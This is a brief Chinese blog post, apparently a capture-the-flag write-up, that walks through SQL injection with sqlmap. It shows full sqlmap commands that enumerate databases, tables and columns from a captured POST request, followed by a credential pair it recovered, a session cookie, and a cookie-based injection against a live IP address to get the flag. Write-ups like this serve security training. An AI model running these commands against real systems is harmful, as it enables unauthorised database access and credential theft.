sqlmap的post註入加cookie
阿新 • • 發佈:2018-05-19
sqlmap cookie 1,首先看下這個網站
2,用抓包工具進行抓包
3,保存到txt文本文檔為1.txt;
4,sqlmap開始註入;
python2 sqlmap.py -r "C:\Users\95112\Desktop\1.txt" -p username --dbs
獲取表
python2 sqlmap.py -r "C:\Users\95112\Desktop\1.txt" -p username -D " sqli_database" --tables
python2 sqlmap.py -r "C:\Users\95112\Desktop\1.txt" -p username -D " sqli_database" -T "user" --columns
最終得到賬號是admin密碼u4g009
登錄成功,得到url
http://118.190.152.202:8011/?id=1
截取cookie
PHPSESSID=gvfqspfsid48p2lf8e6iv0s9d0
繼續sql註入
python2 sqlmap.py -u "http://118.190.152.202:8011/?id=1" --cookie="PHPSESSID=gvfqspfsid48p2lf8e6iv0s9d0" --dbs
最終得到flag
sqlmap的post註入加cookie